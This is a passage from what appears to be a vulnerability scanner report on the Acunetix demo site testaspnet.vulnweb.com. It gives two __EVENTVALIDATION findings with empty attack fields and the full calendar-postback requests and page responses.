in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8184&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAliwGQdoIZGRkQlsxgG2gquLTLgmoV%2FIz9wb%2BuQc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLkz%2B%2BlCAK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2Bu%2FMADCHtIYYoZwNLZLwGFGhgMVA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:12 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAliwGQdoIZGRkQlsxgG2gquLTLgmoV/Iz9wb+uQc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLkz++lCAK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w+u/MADCHtIYYoZwNLZLwGFGhgMVA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:White" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8528&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAsCpXT9sIZGRkwtvPC8Uwr3E4chref9tgqHCtY5M%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLl596GDwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA0ZSS%2BCeAS0yBhvr7JuOrK5HM9MM
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:40 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAsCpXT9sIZGRkwtvPC8Uwr3E4chref9tgqHCtY5M=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLl596GDwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA0ZSS+CeAS0yBhvr7JuOrK5HM9MM" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:White" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying 